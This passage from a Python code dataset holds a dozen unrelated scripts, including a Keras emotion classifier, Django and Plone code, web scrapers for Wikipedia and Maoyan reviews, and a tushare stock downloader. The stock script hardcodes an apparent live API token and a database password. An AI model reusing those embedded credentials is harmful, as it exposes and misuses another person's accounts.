av.cross_validation(emulation_data=emulation_data, wanted_ntest=wanted_ntest, n_vali=1,\n operator=\"DL\", max_train_size = max_ntrain ,min_train_size=min_ntrain,interp_type=\"GP\",number_of_splits=2)\n\nPCA_dict_cross.to_csv(\"./DL_MassiveNus_2.csv\")\n","sub_path":"scripts/DL_MassiveNus_validation_script_2.py","file_name":"DL_MassiveNus_validation_script_2.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426365024","text":"#! 
python3\n\n# First, create a list of users to be verified\n# and an empty list to hold users that have been verified\nunconfirmed_users = ['alice', 'brain', 'candace']\nconfirmed_users = []\n\n# Verify each user until there are no unverified users left\n# Move each verified user into the list of confirmed users\nwhile unconfirmed_users:\n current_user = unconfirmed_users.pop()\n print(\"Verifying user: %s\" % (current_user.title()))\n confirmed_users.append(current_user)\n\n# Display all confirmed users\nprint(\"\\nThe following users have been confirmed: \")\nfor confirmed_user in confirmed_users:\n print(confirmed_user.title())\n","sub_path":"Section1_Getting_started/Chapter7/7.3.1_confirmed_users.py","file_name":"7.3.1_confirmed_users.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630534518","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('categories', '0006_auto_20150726_0016'),\n ('statistics', '0010_auto_20151207_2213'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='nodeone',\n name='category',\n ),\n migrations.AddField(\n model_name='statnode',\n name='category',\n field=models.ForeignKey(related_name='StatNode_Category', default=None, to='categories.Category'),\n preserve_default=False,\n ),\n ]\n","sub_path":"statistics/migrations/0011_auto_20151207_2247.py","file_name":"0011_auto_20151207_2247.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399941725","text":"from __future__ import print_function\nimport keras\nimport sys\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n\nfrom FER2013_Input_Keras import FER2013_Input_Keras\nimport csv\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom numpy import array\nfrom scipy.misc import toimage\nfrom resizeimage import resizeimage\n\nbatch_size = 128\nnum_classes = 7\nepochs = int(sys.argv[1])\n\nimg_rows, img_cols = 84, 84\nfer = FER2013_Input_Keras('/home/alaa/Desktop/GP/', 2)\nTraining_labels, Training_Images = fer.FER2013_Training_Set()\nTesting_labels, Testing_Images = fer.FER2013_Testing_Set()\nValidation_labels, Validation_Images = fer.FER2013_Validation_Set()\nTraining_Images = Training_Images.reshape(Training_Images.shape[0], img_rows, img_cols, 1)\nValidation_Images = Validation_Images.reshape(Validation_Images.shape[0], img_rows, img_cols, 1)\nTesting_Images = Testing_Images.reshape(Testing_Images.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nTraining_Images = Training_Images.astype('float32')\nValidation_Images = Validation_Images.astype('float32')\nTesting_Images = Testing_Images.astype('float32')\nTraining_Images /= 255\nValidation_Images/=255\nTesting_Images /= 255\n\nTraining_labels = keras.utils.to_categorical(Training_labels, num_classes)\nValidation_labels = keras.utils.to_categorical(Validation_labels, num_classes)\nTesting_labels = keras.utils.to_categorical(Testing_labels, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(7, 7),\n activation='relu',\n input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(32, (5, 5), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (5, 5), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 
2)))\n\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(3072, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=float(sys.argv[2]), decay=0.0, momentum=0.0, nesterov=False),\n metrics=['accuracy'])\n\nmodel.fit(Training_Images, Training_labels,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(Validation_Images, Validation_labels))\nscore = model.evaluate(Testing_Images, Testing_labels, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n'''\nmodel_json = model.to_json()\nwith open('model'+sys.argv[3]+'.json', \"w\") as json_file:\n json_file.write(model_json)\nmodel.save_weights('model'+sys.argv[3]+'_weights.h5')\nprint('Model Saved!')\n# load json and create model\njson_file = open('model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\n# evaluate loaded model on test data\nloaded_model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\nscore = loaded_model.evaluate(Testing_Images, Testing_labels, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n'''\n","sub_path":"FER2013_Model_Keras_Second_Scale.py","file_name":"FER2013_Model_Keras_Second_Scale.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416564094","text":"# coding=utf-8\n'''\n@Title:logistic-regression\n\n@Author: tyee.noprom@qq.com\n@Time: 7/14/16 9:47 PM\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef sigmoid(z):\n '''\n The sigmoid function\n :param z: z\n :return: the sigmoid value\n '''\n return 1.0 / (1 + np.exp(-z))\n\n\ndef plot_sigmoid():\n '''\n Plot the sigmoid function\n :return: None\n '''\n # Create an array over [-7, 7) with step 0.1\n z = np.arange(-7, 7, 0.1)\n phi_z = sigmoid(z)\n # Plot\n plt.plot(z, phi_z)\n plt.axvline(0.0, color='k')\n plt.axhspan(0.0, 1.0, facecolor='1.0', alpha=1.0, ls='dotted')\n plt.axhline(y=0.5, ls='dotted', color='k')\n plt.yticks([0.0, 0.5, 1.0])\n plt.ylim(-0.1, 1.1)\n plt.xlabel('z')\n plt.ylabel('$\\phi (z)$')\n plt.show()\n","sub_path":"ch03/logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201568098","text":"\"\"\"Based on Plone Properties tool setup handlers. 
\"\"\"\n\nfrom zope.component import queryMultiAdapter\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.GenericSetup.interfaces import IBody\nfrom Products.GenericSetup.utils import XMLAdapterBase\nfrom Products.GenericSetup.utils import PropertyManagerHelpers\n\n_BASE = 'staticdumpertool.xml'\n_PROPERTIES = 'staticdumpertoolproperties.xml'\n\nclass DumperXMLAdapter(XMLAdapterBase, PropertyManagerHelpers):\n\n \"\"\"XML im- and exporter for Dumper tool properties.\n (Copied from Products.CMFCore.exportimport.properties.PropertiesXMLAdapter)\n \"\"\"\n\n _LOGGER_ID = 'staticdumpertool'\n\n def _exportNode(self):\n \"\"\"Export the object as a DOM node.\n \"\"\"\n self._encoding = self.context.getProperty('default_charset', 'utf-8')\n\n node = self._doc.createElement('dumpertool')\n node.appendChild(self._extractProperties())\n\n self._logger.info('StaticDumper properties exported.')\n return node\n\n def _importNode(self, node):\n \"\"\"Import the object from the DOM node.\n \"\"\"\n self._encoding = self.context.getProperty('default_charset', 'utf-8')\n\n for child in node.childNodes:\n if child.nodeName != 'property':\n continue\n if child.getAttribute('name') != 'default_charset':\n continue\n self._encoding = self._getNodeText(child) or 'utf-8'\n break\n\n # Raise an error on 'dumper' property. Why?\n #if self.environ.shouldPurge():\n #self._purgeProperties()\n\n self._initProperties(node)\n\n self._logger.info('StaticDumper properties imported.')\n\ndef importStaticDumper(context):\n \"\"\" Import staticdumper tool.\n \"\"\"\n site = context.getSite()\n logger = context.getLogger('staticdumpertool')\n ptool = getToolByName(site, 'portal_dumper', None)\n\n if ptool is None:\n logger.info('Nothing to import.')\n return \n\n # tool\n body = context.readDataFile(_BASE)\n if body is None:\n logger.info('Nothing to import.')\n return\n\n importer = DumperXMLAdapter(ptool, context)\n importer.body = body\n\n # property sheets\n body = context.readDataFile(_PROPERTIES)\n if body is None:\n logger.info('Nothing to import.')\n return\n\n importer = queryMultiAdapter((ptool, context), IBody)\n if importer is None:\n logger.warning('Import adapter missing.')\n return\n\n importer.body = body\n logger.info('StaticDumper dumpers properties imported.')\n\n logger.info('StaticDumper tool imported.')\n\ndef exportStaticDumper(context):\n \"\"\" Export staticdumper tool.\n \"\"\"\n site = context.getSite()\n logger = context.getLogger('staticdumpertool')\n ptool = getToolByName(site, 'portal_dumper', None)\n if ptool is None:\n logger.info('Nothing to export.')\n return\n\n # tool\n exporter = DumperXMLAdapter(ptool, context)\n context.writeDataFile(_BASE, exporter.body, exporter.mime_type)\n\n # property sheets\n exporter = queryMultiAdapter((ptool, context), IBody)\n\n if exporter is None:\n logger.warning('Export adapter missing.')\n return\n\n context.writeDataFile(_PROPERTIES, exporter.body, exporter.mime_type)\n logger.info('StaticDumper properties exported.')\n\n logger.info('StaticDumper tool exported.')\n","sub_path":"packages/oops.staticdump/branches/book-dumpers-removal/oops/staticdump/exportimporttool.py","file_name":"exportimporttool.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"62126219","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 23 11:37:55 2020\n\n@author: malcolmmccabe\n\"\"\"\n\n\"\"\"\nPurdue v. 
Virginia Data Analysis\n\"\"\"\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\nimport os\nimport nltk\nfrom collections import Counter \nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\n#Read in CSV as dataframe\ndf = pd.read_csv('PurdueData.csv')\n\n#Remove last row \ndf = df[:-1]\n\n'''\ncolumn_list1 = ['PTS']\ndf[column_list1].plot(kind='bar')\nplt.show()\n'''\nfile = open(\"/Users/malcolmmccabe/Desktop/Python File/Text Files/VirginiaVSPurdue.txt\", 'r')\nmyfile = file.read()\n\n#Split file into words\ntokens = nltk.word_tokenize(myfile)\n\n#Normalize words by lowercasing all\nlower_tokens = [w.lower() for w in tokens]\n\n#Eliminate non-alpha tokens\nalpha_only = [t for t in lower_tokens if t.isalpha()]\n\n#Eliminate stop words \nno_stops = [t for t in alpha_only if t not in stopwords.words('english')]\n\n#Instantiate WordNetLemmatizer\nwnl = WordNetLemmatizer()\n\n#Lemmatize tokens\nlemmatized = [wnl.lemmatize(t) for t in no_stops]\n\n#Count tokens \nbow = Counter(lemmatized)\n\n#Print most common tokens \n#print(bow.most_common(50))\n\n#problems with doing this: sometimes first and last name is said at same time,\n#so we are double counting. \n#closed captions don't always spell players' names correctly \n\nnames_dict = {}\n \nfor k,v in bow.items():\n if k == 'edward' or k == 'carson':\n names_dict['Carsen Edwards'] = bow.get('edward') + bow.get('carson')\n \n if k == 'ryan' or k == 'klein':\n names_dict['Ryan Cline'] = bow.get('ryan') + bow.get('klein')\n \n if k == 'matt' or k == 'harm':\n names_dict['Matt Haarms'] = bow.get('matt') + bow.get('harm')\n \n #this one was tough - no jail, no jelly \n if k == 'eastern':\n names_dict['Nojel Eastern'] = bow.get('eastern')\n \n if k == 'grady' or k == 'eyford':\n names_dict['Grady Eifert'] = bow.get('grady') + bow.get('eyford')\n \n if k == 'aaron' or k == 'wheeler':\n names_dict['Aaron Wheeler'] = bow.get('aaron') + bow.get('wheeler')\n \n if k == 'treyvion' or k == 'williams':\n names_dict['Trevion Williams'] = bow.get('treyvion') + bow.get('williams')\n \n #problem with this one: there is another Hunter\n if k == 'eric' or k == 'hunter': \n names_dict['Eric Hunter Jr.'] = bow.get('eric') + bow.get('hunter')\n \n if k == 'sasha' or k == 'stefanovic':\n names_dict['Sasha Stefanovic'] = bow.get('sasha') + bow.get('stefanovic')\n \n\nprint(names_dict)\n\n#Maps dictionary values with players in dataframe\ndf['Times_Name_Said'] = df['Starters'].map(names_dict)\n\nprint(df)\n\n#Bar Graph with axis set equal to Times Name Said and Minutes Played\nbar_graph = plt.figure()\n\nax = bar_graph.add_subplot(111)\nax2 = ax.twinx()\n\nwidth = 0.3\n\ndf.MP.plot(kind='bar', color='red', ax=ax, width=width, position=1)\ndf.Times_Name_Said.plot(kind='bar', color='blue', ax=ax2, width=width, position=0)\n\nax.set_ylabel('Minutes Played')\nax2.set_ylabel('Times Name Said')\nax.set_xticklabels(df['Starters'])\n\nplt.show()\n\nteam_dict = {}\n\nfor k,v in bow.items():\n if k == 'virginia':\n team_dict['Virginia'] = bow.get('virginia')\n \n if k == 'perdue' or k == 'purdue':\n team_dict['Purdue'] = bow.get('purdue') + bow.get('perdue')\n\nprint(team_dict)\n\n","sub_path":"Malcolm/Analysis_Practice/DataAnalysis_NCAA.py","file_name":"DataAnalysis_NCAA.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343445885","text":"##Vowel counts\n\n#Declare the lists and variables we need\nlista = 
[]\nnumA = 0\nnumE = 0\nnumI = 0\nnumO = 0\nnumU = 0\n\nA = False\nE = False\nI = False\nO = False\nU = False\n\n#Cast the input string to a list and separate each character\nprint(\"Enter your phrase\")\nstring = input()\nstring = string.split()\n#print(string)\nnewstring = \"\".join(string)\n#print(newstring)\nnewstring = newstring.lower()\nnewstring = list(newstring)\n\n#print(lista)\n\nlargoString = len(newstring)\n\nfor i in range(largoString):\n\n\t#print(i)\n\n\tif newstring[i] == 'a':\n\n\t\tnumA = numA + 1\n\n\t\tA = True\n\n\telif newstring[i] == 'e':\n\n\t\tnumE = numE + 1\n\n\t\tE = True\n\n\n\telif newstring[i] == 'i':\n\n\t\tnumI = numI + 1\n\n\t\tI = True\n\n\n\telif newstring[i] == 'o':\n\n\t\tnumO = numO + 1\n\n\t\tO = True\n\n\n\telif newstring[i] == 'u':\n\n\t\tnumU = numU + 1\n\n\t\tU = True\n\n\n\nprint(\"Vowel frequency\")\n\nif A == True:\n\tprint(\"A -> \", numA)\nif E == True:\n\tprint(\"E -> \", numE)\nif I == True:\n\tprint(\"I -> \", numI)\nif O == True:\n\tprint(\"O -> \", numO)\nif U == True:\n\tprint(\"U -> \", numU)\n","sub_path":"Practicas/Clase3/prueba/freqVocales.py","file_name":"freqVocales.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202604953","text":"#! python3\n\"\"\"Write a program that opens all .txt files in a folder and searches for\nany line that matches a user-supplied regular expression.\nThe results should be printed to the screen.\"\"\"\n\nimport os\nimport re\n\n\ndef search_the_dir(dir_path, pattern):\n \"\"\"Open all text files in a directory and look for given regular expression.\"\"\"\n for file in os.listdir(dir_path):\n if file.endswith('.txt'):\n file_path = os.path.join(dir_path, file)\n with open(file_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if re.findall(pattern, line):\n print(f'{file_path}: {line}')\n\ndef main():\n user_path = input(\"Type the path to folder you'd like to search through:\\n\")\n dir_path = r'{}'.format(user_path)\n user_pattern = input('Type the regular expression to be looked for:\\n')\n pattern = re.compile(r'{}'.format(user_pattern))\n search_the_dir(dir_path, pattern)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"Chapter_08-Reading_and_Writing_Files/regex_search.py","file_name":"regex_search.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245375027","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.cross_validation import train_test_split\nimport numpy\nimport pickle\nimport csv\nfrom scipy import stats\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.grid_search import RandomizedSearchCV\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.externals import joblib\n\n\n\ndef writeToCSV(answer):\n with open('GradientBoostinglog.csv', 'wb') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=',',)\n spamwriter.writerow(['Id','Action'])\n for item in range(len(answer)):\n spamwriter.writerow([item+1,answer[item]])\n\ndef 
getPercent(guess,correct):\n totalMiss = 0\n for i in range(len(guess)):\n if guess[i]!=correct[i]:\n #print(guess[i], correct[i])\n totalMiss+=1\n\n\n return (float(totalMiss)/len(guess))\n\n\ndef matrixFromCSV(path):\n csvFile = open(path).read().split(\"\\n\")\n vals = csvFile[1:]\n listOfVals = []\n listOfActions = []\n highest = [312153, 311696, 311178, 286791, 286792, 311867, 311867, 308574, 270691]\n for elem in vals:\n stringVals = elem.split(\",\")[1:]\n intVals = numpy.array([float(stringVals[i])/highest[i] for i in range(len(stringVals))])\n #intVals.reshape(9,1)\n if len(intVals)!=0:\n listOfVals.append(intVals[:-2])\n try:\n listOfActions.append(int(elem.split(\",\")[0]))\n except:\n pass\n return numpy.array(listOfVals), numpy.array(listOfActions) \n\ndef main():\n vals, actions = matrixFromCSV(\"C:\\\\Users\\\\Chrisd\\\\Documents\\\\College\\\\Spring 2016\\\\379K\\\\Kaggle\\\\Kaggle\\\\train.csv\")\n X_train, X_test, y_train, y_test = train_test_split(vals, actions, test_size=0.33, random_state=22)\n totalTest, totalAns = matrixFromCSV(\"C:\\\\Users\\\\Chrisd\\\\Documents\\\\College\\\\Spring 2016\\\\379K\\\\Kaggle\\\\Kaggle\\\\test.csv\")\n #test = RandomForestClassifier(max_depth=20, n_estimators=15, max_features=5)\n clf = GradientBoostingClassifier()\n param_dist = [{\"loss\":['deviance',], \"learning_rate\":[.12,.1,.08], \"n_estimators\":[100], \"subsample\":[1.0], \n \"min_samples_split\":[2], \"min_samples_leaf\":[1], \"min_weight_fraction_leaf\":[0.0], \"max_depth\":[10], \n \"init\":[None], \"random_state\":[None], \"max_features\":[None, \"auto\",], \"verbose\":[0], \"max_leaf_nodes\":[None], \"warm_start\":[False], \"presort\":['auto']}\n ]\n random_search = GridSearchCV(clf, param_grid=param_dist,\n cv=5, n_jobs=3, verbose=50, scoring='roc_auc')\n random_search.fit(X_train,y_train)\n joblib.dump(random_search, 'GradientBoostinglog.pkl')\n random_search = joblib.load('GradientBoostinglog.pkl')\n print(random_search.best_estimator_)\n #print(random_search.grid_scores_)\n print(random_search.best_score_)\n writeToCSV(random_search.predict_proba(X_test)[:,1])\n print(random_search.score(X_test,y_test))\n\nif __name__ == '__main__':\n main()","sub_path":"GradientBoostingModel.py","file_name":"GradientBoostingModel.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23946590","text":"import getopt\nimport sys\nimport app.db.connection as con\nimport regex\n\nfrom requests_html import HTMLSession\nfrom app.db.config import db_config\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup, Comment\nfrom app.model.city import City\nfrom psycopg2 import IntegrityError, ProgrammingError\n\ndef parse_city(details_link, name):\n # 3. 
Get details url\n details_html = urlopen(details_link)\n soup_details = BeautifulSoup(details_html.read(), 'html5lib')\n if soup_details:\n\n # In case the details page fails to parse\n print('Crawling details page: %s' % details_link)\n try:\n details_table = soup_details.find('table', attrs={'class': 'wikitable float-right'}).find('tbody')\n except Exception as e:\n print('Failed due to: %s' % e.__cause__)\n\n detail_rows = details_table.findAll('tr')\n\n canton = detail_rows[3].findAll('td')[1].find('a')\n if canton:\n canton = canton.getText()\n\n state = detail_rows[4].findAll('td')[1].find('a')\n if state:\n state = state.getText()\n\n postal_codes = details_table.find('a', title=regex.compile('.*Postleitzahl.*')).parent.parent.findAll('td')[1]\n if postal_codes:\n postal_codes = postal_codes.getText()\n postal_codes = regex.findall(r'\\d{4}', postal_codes)\n\n for postal_code in postal_codes:\n coords_link = details_table.find('span', attrs={'class': 'coordinates'})\n lat = None\n lng = None\n if coords_link:\n coords_link = coords_link.find('a', attrs={'class': 'external text'})\n if coords_link:\n coords_link = coords_link.get('href')\n lat = regex.findall(r'(?<=params=)(.*)(?=\\_N)', coords_link)[0]\n lng = regex.findall(r'(?<=\\_N_)(.*)(?=\\_E)', coords_link)[0]\n\n website = details_table.find('a', href=regex.compile('.*www.*'))\n if website:\n website = website.getText()\n\n existing_city = City.find_by_postal_code_and_alpa_2_code(postal_code=postal_code, alpha_2_code='CH')\n if existing_city is not None:\n existing_city.name = name\n existing_city.website = website\n print('Updating City name:%s and postal_code:%s' % (existing_city.name, existing_city.postal_code))\n try:\n existing_city.update()\n except IntegrityError as e:\n print(e)\n except ProgrammingError as e:\n print(e)\n else:\n new_city = City(postal_code=postal_code, name=name, state=state, latitude=lat,\n longitude=lng, canton=canton, website=website,\n alpha_2_code='CH', country='Schweiz')\n print('Creating City name:%s and postal_code:%s' % (new_city.name, new_city.postal_code))\n try:\n new_city.insert()\n except IntegrityError as e:\n print(e)\n except ProgrammingError as e:\n print(e)\n print(new_city.__dict__)\n\ndef parse_cities():\n # First clear cities in database\n alphabet = list(map(chr, list(range(65, 91))))\n\n # 1. Iterate through all city lists\n for char in alphabet:\n html = urlopen('https://de.wikipedia.org/wiki/Gemeinden_der_Schweiz-%s' % char)\n soup = BeautifulSoup(html.read(), 'html5lib')\n\n cities_table = soup.find('table', attrs={'class': 'wikitable'})\n if cities_table:\n cities_table = cities_table.find('tbody')\n city_entries = cities_table.findAll('tr')\n else:\n cities_table = soup.find('ul')\n city_entries = cities_table.findAll('li')\n\n for city_row in city_entries:\n details_url = city_row.find('a', href=True)\n if not isinstance(city_row, Comment) and details_url is not None:\n # 2. 
Iterate through all cities\n name = details_url.getText()\n details_url = details_url.get('href')\n if details_url:\n parse_city('https://de.wikipedia.org%s' % details_url, name=name)\n\ndef main():\n argv = sys.argv\n try:\n opts, args = getopt.getopt(argv[1:], 'd:', ['db='])\n except getopt.GetoptError:\n sys.exit(2)\n\n # Setup DB environment\n env = list(filter(lambda x: x[0] in ('-d', '--db'), opts))\n if env and len(env) > 0:\n env = env[0][1]\n else:\n env = next(iter(db_config.keys()))\n\n con.set_db_config(db_config[env])\n\n parse_cities()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/swiss_locations.py","file_name":"swiss_locations.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"147529687","text":"\"\"\"\n author: Shawn\n time : 7/21/18 5:25 PM\n desc : collect Maoyan movie review data\n update: Shawn 7/21/18 5:25 PM\n\"\"\"\n\nimport requests\nimport json\nimport time\nimport random\n\nagents = [\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',\n 'chrome/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ucbrowser/64.0.3282.140 Safari/537.36',\n 'safri/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',\n 'ucbrowser/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) webkit/64.0.3282.140 Safari/537.36',\n 'Mozilla',\n]\n\n\n# Download one page of data\ndef get_one_page(url):\n headers = {\n 'Host': 'm.maoyan.com',\n 'User-Agent': random.choice(agents)\n }\n\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n print('body: %s' % response.text)\n return response.text\n\n return None\n\n\n# Parse one page of data\ndef parse_one_page(html):\n data = json.loads(html)['cmts']\n\n for item in data:\n yield {\n 'comment': item['content'],\n 'date': item['time'].split(' ')[0],\n 'rate': item['score'],\n 'city': item['cityName'],\n 'nickname': item['nickName']\n }\n\n\n# Save the data to a text file\ndef save_to_txt():\n for i in range(1, 1001):\n print('start...')\n url = 'http://m.maoyan.com/mmdb/comments/movie/248566.json?_v_=yes&offset=' + str(i)\n # url = 'http://www.baidu.com'\n html = get_one_page(url)\n print('Saving page %d.' % i)\n\n for item in parse_one_page(html):\n with open('old.txt', 'a', encoding='utf-8') as f:\n f.write(\n item['date'] + ',' + item['nickname'] + ',' + item['city'] + ',' + str(item['rate']) + ',' + item[\n 'comment'] + '\\n')\n\n # time.sleep(0.1 + float(random.randint(1, 100)) / 20)\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n save_to_txt()\n","sub_path":"src/demo/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164350294","text":"#!/usr/bin/python3\n# coding:utf-8\n# -*- coding: utf-8 -*-\n\nimport time\nimport datetime\nimport random\n\nimport tushare\nimport pandas\n#import pymssql\n#import sqlalchemy\n#import mysql.connector\nimport sqlalchemy\nimport pymysql\n\n\n\n# Parameters that need to be modified\nstock_list_file = 'd:/stock_list.csv'\ndatabasename = 'msstock'\nsqlenginestr='mysql+pymysql://pyuser:Pyuser18@127.0.0.1/'+databasename+'?charset=utf8mb4'\ndatabasename = 'msstock'\n#tushare token\ntushare_token='e239683c699765e4e49b43dff2cf7ed7fc232cc49f7992dab1ab7624'\n\n# Stock list\ndef initiate():\n # Initialize tushare\n tushare.set_token(tushare_token)\n engine=sqlalchemy.create_engine(sqlenginestr)\n return 
engine\n\ndef get_stock_basic(engine = sqlenginestr,schema = databasename):\n print('start to download stock_basic data') \n pro = tushare.pro_api()\n df = pro.stock_basic(fields='ts_code,symbol,name,area,industry,fullname,cnspell,market,exchange,curr_type,list_status,list_date,delist_date,is_hs')\n try:\n pandas.io.sql.to_sql(frame=df, name='tb_stock_basic', con=engine, schema= schema, if_exists='replace', index=True) \n except:\n print('To SQL Database Failed')\n finally:\n pass\n print('download stock_basic data succeeded!')\n return 1\n\ndef get_trade_cal(engine = sqlenginestr,schema = databasename):\n print('start to download trade_cal data') \n date_now = datetime.datetime.now().strftime('%Y%m%d')\n pro = tushare.pro_api()\n df = pro.trade_cal(start_date='20200101', end_date=date_now, fields='exchange,cal_date,is_open')\n try:\n pandas.io.sql.to_sql(frame=df, name='tb_trade_cal', con=engine, schema= schema, if_exists='replace', index=True) \n except:\n print('To SQL Database Failed')\n finally:\n pass\n print('download trade_cal data succeeded!')\n return 1\n\n\n# Full download of all stock list data\nif __name__ == '__main__':\n print('Start')\n engine = initiate()\n print('Fetching lists...')\n get_stock_basic(engine,databasename)\n get_trade_cal(engine,databasename)\n print('Done')\n","sub_path":"Rabbit/getstockbasic.py","file_name":"getstockbasic.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320396","text":"from django.conf.urls import url\r\nfrom discussion import views\r\n\r\nurlpatterns = [\r\n url(r'^comments/(?P[0-9]+)/$',\r\n views.CommentDetail.as_view(),\r\n name='comment-detail'),\r\n url(r'^$',\r\n views.DiscussionList.as_view(),\r\n name='discussion-list'),\r\n url(r'^(?P[0-9]+)/$',\r\n views.DiscussionDetail.as_view(),\r\n name='discussion-detail'),\r\n url(r'^(?P[0-9]+)/comments/$',\r\n views.DiscussionComments.as_view(),\r\n name='discussion-comments'),\r\n]\r\n","sub_path":"discussion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"413280752","text":"import os\nimport sys\nsys.path.append(os.path.abspath('..'))\nfrom libs.data_preprocess.my_data import write_images_labels_csv, write_csv_based_on_dir\nfrom libs.data_preprocess.my_data_patiend_id import split_dataset_by_pat_id\n\ntask_type = '3D_OCT_AMD'\n#zeiss ZEISS ,Topocon\ndict_mapping = {'M0': 0, 'M1': 1}\ndir_process = '/disk1/3D_OCT_AMD/2021_4_22/preprocess/128_128_128/'\n\ndata_version = 'v1'\n\ncsv_all = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '.csv'))\nwrite_csv_based_on_dir(csv_all, dir_process, dict_mapping,\n match_type='partial', list_file_ext=['.npy', '.NPY'])\n\n\nfiles_train, labels_train, files_valid, labels_valid, files_test, labels_test = \\\n split_dataset_by_pat_id(csv_all,\n valid_ratio=0.15, test_ratio=0.15, random_state=111)\ncsv_train = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_train.csv'))\ncsv_valid = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_valid.csv'))\ncsv_test = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_test.csv'))\nwrite_images_labels_csv(files_train, labels_train,\n filename_csv=csv_train)\nwrite_images_labels_csv(files_valid, labels_valid,\n 
